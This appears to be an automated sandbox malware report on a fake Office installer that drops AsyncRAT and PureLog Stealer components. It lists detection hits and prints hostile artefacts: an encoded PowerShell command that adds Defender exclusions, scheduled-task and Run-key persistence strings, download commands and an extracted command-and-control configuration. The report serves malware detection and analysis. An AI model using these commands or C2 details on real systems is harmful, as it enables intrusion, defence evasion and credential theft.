12.2.Lxfrfbi.exe.6e41788.21.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.350ae90.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.Lxfrfbi.exe.6e41788.21.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.Lxfrfbi.exe.33ac330.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
12.2.Lxfrfbi.exe.33ac330.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x3c7cb:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x3dae0:$a2: Stub.exe 0x3db70:$a2: Stub.exe 0x415a7:$a3: get_ActivatePong 0x4b77f:$a3: get_ActivatePong 0x3c9e3:$a4: vmware 0x3c85b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x42302:$a6: get_SslClient 0x4c4da:$a6: get_SslClient
12.2.Lxfrfbi.exe.33ac330.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x3c85d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
15.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.AppLaunch.exe.400000.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient
15.2.AppLaunch.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
12.2.Lxfrfbi.exe.6f317c8.15.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.Lxfrfbi.exe.31fb2c0.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.77f17c8.16.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.4c9de48.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.4b1de08.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.4abddc8.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1d32f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x1e660:$a2: Stub.exe 0x1e6f0:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x1a10b:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x1d547:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1d3bf:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient 0x1ae66:$a6: get_SslClient
3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1d3c1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1d333:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x1e670:$a2: Stub.exe 0x1e700:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x1a10f:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x1d54b:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1d3c3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient 0x1ae6a:$a6: get_SslClient
12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1d3c5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Vulvvmkewji.exe.7a90000.21.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.350ae90.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.6d69838.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.4e9de68.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.7730000.20.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.Vulvvmkewji.exe.7730000.20.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.0.Office Installer.exe.7ff6c80ea6da.2.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
0.2.Gm602axA2d.exe.4ba1cfa.4.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
4.2.Office Installer.exe.7ff6c80ea6da.2.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
4.2.Office Installer.exe.7ff6c80ea6da.2.raw.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
4.0.Office Installer.exe.7ff6c80ea6da.2.raw.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
4.0.Office Installer.exe.7ff6c7e70000.0.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
4.2.Office Installer.exe.7ff6c7e70000.0.unpack	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Click to see the 69 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Gm602axA2d.exe", ParentImage: C:\Users\user\Desktop\Gm602axA2d.exe, ParentProcessId: 7136, ParentProcessName: Gm602axA2d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", ProcessId: 2004, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Office Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Office Installer.exe, ParentProcessId: 7336, ParentProcessName: Office Installer.exe, ProcessCommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Lxfrfbi.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Vulvvmkewji.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lxfrfbi

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Office Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Office Installer.exe, ParentProcessId: 7336, ParentProcessName: Office Installer.exe, ProcessCommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Office Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Office Installer.exe, ParentProcessId: 7336, ParentProcessName: Office Installer.exe, ProcessCommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Gm602axA2d.exe", ParentImage: C:\Users\user\Desktop\Gm602axA2d.exe, ParentProcessId: 7136, ParentProcessName: Gm602axA2d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", ProcessId: 2004, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Office Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Office Installer.exe, ParentProcessId: 7336, ParentProcessName: Office Installer.exe, ProcessCommandLine: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Gm602axA2d.exe", ParentImage: C:\Users\user\Desktop\Gm602axA2d.exe, ParentProcessId: 7136, ParentProcessName: Gm602axA2d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=", ProcessId: 2004, ProcessName: powershell.exe

Snort Signatures

ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) - Source IP: 95.211.208.153 - Destination IP: 192.168.2.4

Timestamp:	04/29/24-10:22:16.075124
SID:	2030673
Source Port:	7707
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic AsyncRAT Style SSL Cert - Source IP: 95.211.208.153 - Destination IP: 192.168.2.4

Timestamp:	04/29/24-10:22:16.075124
SID:	2035595
Source Port:	7707
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Gm602axA2d.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://msfree.su/donaties/donations.html	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "5512.sytes.net,95.211.208.153", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "Llg9a02PERRO", "Autorun": "false", "Group": "null"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Virustotal: Detection: 63%	Perma Link
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Virustotal: Detection: 63%	Perma Link

Multi AV Scanner detection for submitted file

Source: Gm602axA2d.exe	ReversingLabs: Detection: 76%
Source: Gm602axA2d.exe	Virustotal: Detection: 60%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Gm602axA2d.exe

Joe Sandbox ML: detected

Source: Gm602axA2d.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Vulvvmkewji.exe, 00000003.00000002.2112262363.00000000086B1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2112262363.0000000008701000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2262077999.0000000009550000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp

Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: - REG QUERY HKLM\Software\Microsoft\Office /s /v Path /reg:64ProjectStd2019Volume/Office/Data/v32_Office 2019 Perpetual Enterprise (Insiders)PowerPoint2019Volume74c05ccb-df823b-8Microsoft::DCda1aFarsifile stream.xda083338fJNROffice 2019 SkypeforBusiness2019VL KMS Client AE\command === Run OLicenseCleanup.vbs ===http://officecdn.microsoft.com/pr/ActiveConfigurationhttp://officecdn.microsoft.com/PR/Office 2019 ProjectPro2019VL KMS Client AE677fe01-6abGUI_Lang = ru\|en-7378-4MG-DBadd "HKCU\Software\Microsoft\Office\16.0\OSM\preventedapplications" /v "publishersolution" /t REG_DWORD /d 1 /f0.cab', 'Office_2013_C2R_ISO_NQ-K3NG-Y7\autorun.infVR6-FQQ891-67142Q628-cceProjectPro2019VolumeWindows NT 3.51, D36-9VX313Teams forceappshutdown=True piniconstotaskbar=False acceptalleulas.16=True updatesenabled.16=True updatepromptuser=True updatebaseurl.16=http://officecdn.microsoft.com/pr/\|VisioStdRetail.16.ISO799--- Selecting a mirror ---10922G7-G6RPD-YXWXYca6RQ-JTSet objShell = CreateObject("Shell.Application")REG QUERY HKLM\Software\WOW6432Node\Microsoft\Office /s /v PathNY-BYNG2d6a9cApplications\dc9DFM-8R6-5ec9-4-command "& { (New-Object Net.WebClient).DownloadFile('http://officecdn.microsoft.com/pr/PDT-KTQad83942856QG-3W\\StringFileInfo\\replace.batScheduler: 5 Office Telemetry related Tasks were set / changed ...sp32ja-jpja-JP
Source: Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: - 23f-bProPlus 2019 Volume06b5493b1d[autorun]HomeBusiness 2019 Retail#
